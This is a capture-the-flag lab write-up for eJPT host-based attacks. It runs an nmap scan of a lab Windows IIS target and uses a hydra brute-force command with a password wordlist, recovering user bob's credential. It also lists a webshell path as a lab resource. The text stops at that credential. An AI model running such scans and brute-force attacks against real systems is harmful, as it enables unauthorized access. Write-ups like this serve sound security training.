Host & Network Penetration Testing: System-Host Based Attacks CTF 1

Welcome to the first System-Host Based Attacks CTF 1 lab writeup for the eJPT. Let’s get started!

Attacking IP: 10.10.48.2

Target IPs: target1.ine.local - 10.3.16.216

         target2.ine.local - 10.3.18.42

Below are wordlists recommended by the lab we use for our tasks.

/usr/share/metasploit-framework/data/wordlists/common_users.txt, 
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt,
/usr/share/webshells/asp/webshell.asp

Flag 1: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located. (target1.ine.local)

Let’s run our nmap scan and start our enumeration. After running our nmap scan below we can see there’s a few open port for this target. Related to the first task I’m willing to bet that the user bob is associated with one of these open services. Let’s check out the web service on port 80 and see if we can find a login portal.

nmap -sV -sC 10.3.16.216

Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2026-01-10 03:22 IST
Nmap scan report for target1.ine.local (10.3.16.216)
Host is up (0.0027s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION

80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\\x0D
|_  Basic realm=target1.ine.local
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.

135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-09T21:52:17+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-JVD17HK
| Not valid before: 2026-01-08T21:44:55
|_Not valid after:  2026-07-10T21:44:55
| rdp-ntlm-info: 
|   Target_Name: EC2AMAZ-JVD17HK
|   NetBIOS_Domain_Name: EC2AMAZ-JVD17HK
|   NetBIOS_Computer_Name: EC2AMAZ-JVD17HK
|   DNS_Domain_Name: EC2AMAZ-JVD17HK
|   DNS_Computer_Name: EC2AMAZ-JVD17HK
|   Product_Version: 10.0.17763
|_  System_Time: 2026-01-09T21:52:09+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-09T21:52:10
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Sure enough if we go to the target1.ine.local URL we find a login portal that will probably accept our username. We can use hydra to brute force a password I bet. Something else to note here when we see a Microsoft IIS service running on port 80 is to consider what could be happening here. There could be a webdav, a web portal, default directories, or other possibilities. In this labs case it’s going to be a webdav but we need to test that to be sure.

Important Note: It’s easy to follow walkthroughs like this when most of the time we’re being guided down the only solution that will work and not seeing all the failed options tried by the user practicing the lab so keep this awareness in mind as you build your skills. Try to give your brain a fair chance at recalling what you’ve studied already to try and build that muscle memory. That will help you become a stronger hacker.

hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get

[80][http-get] host: target1.ine.local   login: bob   password: password_123321